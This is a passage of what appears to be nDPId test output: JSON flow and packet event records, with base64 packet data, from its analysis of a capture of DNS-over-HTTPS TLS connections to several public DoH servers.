IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="}
01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/d